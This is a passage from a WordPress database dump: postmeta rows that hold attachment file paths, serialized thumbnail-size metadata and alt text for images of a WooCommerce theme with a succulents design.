s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1192,4255,'_wp_attachment_image_alt','o'),(1193,1216,'_wp_attachment_image_alt','o'),(1194,1277,'_wp_attachment_image_alt','o'),(1195,1283,'_wp_attached_file','2018/01/h9-img-5.jpg'),(1196,1283,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:961;s:6:\"height\";i:1104;s:4:\"file\";s:20:\"2018/01/h9-img-5.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h9-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h9-img-5-600x689.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:689;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h9-img-5-261x300.jpg\";s:5:\"width\";i:261;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h9-img-5-891x1024.jpg\";s:5:\"width\";i:891;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h9-img-5-768x882.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:882;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h9-img-5-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h9-img-5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h9-img-5-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h9-img-5-961x550.jpg\";s:5:\"width\";i:961;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h9-img-5-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"h9-img-5-961x1100.jpg\";s:5:\"width\";i:961;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h9-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h9-img-5-600x689.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:689;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h9-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1197,1578,'_wp_attachment_image_alt','d'),(1198,3565,'_wp_attachment_image_alt','o'),(1199,1584,'_wp_attached_file','2018/01/Untitled-1.jpg'),(1200,1584,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:397;s:6:\"height\";i:752;s:4:\"file\";s:22:\"2018/01/Untitled-1.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"Untitled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-158x300.jpg\";s:5:\"width\";i:158;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-397x300.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"Untitled-1-397x550.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"Untitled-1-397x550.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"Untitled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1201,3566,'_wp_attached_file','2018/02/landing-slide2-graphic2.png'),(1202,3566,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:528;s:6:\"height\";i:629;s:4:\"file\";s:35:\"2018/02/landing-slide2-graphic2.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide2-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic2-252x300.png\";s:5:\"width\";i:252;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic2-528x300.png\";s:5:\"width\";i:528;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic2-528x550.png\";s:5:\"width\";i:528;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic2-528x550.png\";s:5:\"width\";i:528;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide2-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1203,1584,'_wp_attachment_image_alt','o'),(1204,1631,'_wp_attached_file','2018/01/h7-img-21.png'),(1205,1631,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:323;s:6:\"height\";i:171;s:4:\"file\";s:21:\"2018/01/h7-img-21.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-21-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-21-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-21-300x159.png\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-21-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-21-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-21-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-21-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1206,1631,'_wp_attachment_image_alt','a'),(1207,1633,'_wp_attached_file','2018/01/h7-img-20.jpg'),(1208,1633,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:466;s:6:\"height\";i:492;s:4:\"file\";s:21:\"2018/01/h7-img-20.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-20-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-20-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-20-284x300.jpg\";s:5:\"width\";i:284;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h7-img-20-466x300.jpg\";s:5:\"width\";i:466;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-20-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-20-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-20-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1209,3562,'_wp_attachment_image_alt','o'),(1210,3565,'_wp_attachment_image_alt','o'),(1211,3566,'_wp_attachment_image_alt',''),(1212,1633,'_wp_attachment_image_alt','a'),(1213,3570,'_wp_attached_file','2018/02/landing-background-leaves-1.jpg'),(1214,3570,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:877;s:4:\"file\";s:39:\"2018/02/landing-background-leaves-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:39:\"landing-background-leaves-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-600x274.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-300x137.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-1-1024x468.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-768x351.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:351;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-1-1536x702.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:702;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-550x877.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:877;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-1-1100x877.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:877;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:39:\"landing-background-leaves-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-600x274.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1215,1715,'_wp_attached_file','2018/02/h5-img-2.jpg'),(1216,1715,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:20:\"2018/02/h5-img-2.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h5-img-2-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-2-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h5-img-2-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h5-img-2-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h5-img-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h5-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"h5-img-2-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h5-img-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"h5-img-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h5-img-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"h5-img-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h5-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h5-img-2-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1217,3311,'_wp_attachment_image_alt',''),(1218,3566,'_wp_attachment_image_alt',''),(1219,3570,'_wp_attachment_image_alt','a'),(1220,3312,'_wp_attached_file','2018/02/h4-slide1-graphic2.png'),(1221,3312,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:316;s:6:\"height\";i:330;s:4:\"file\";s:30:\"2018/02/h4-slide1-graphic2.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic2-287x300.png\";s:5:\"width\";i:287;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic2-316x300.png\";s:5:\"width\";i:316;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1222,3583,'_wp_attached_file','2018/02/leaf-img-1.png'),(1223,3583,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:266;s:6:\"height\";i:202;s:4:\"file\";s:22:\"2018/02/leaf-img-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"leaf-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"leaf-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"leaf-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1224,3583,'_wp_attachment_image_alt','a'),(1225,3584,'_wp_attached_file','2018/02/leaf-img-2.png'),(1226,3584,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:137;s:6:\"height\";i:134;s:4:\"file\";s:22:\"2018/02/leaf-img-2.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"leaf-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"leaf-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1227,1277,'_wp_attachment_image_alt','o'),(1228,1283,'_wp_attachment_image_alt','o'),(1229,3584,'_wp_attachment_image_alt','a'),(1230,3586,'_wp_attached_file','2018/02/landing-background-leaves-3.jpg'),(1231,3586,'_wp_attachment_metadata','a:5:{s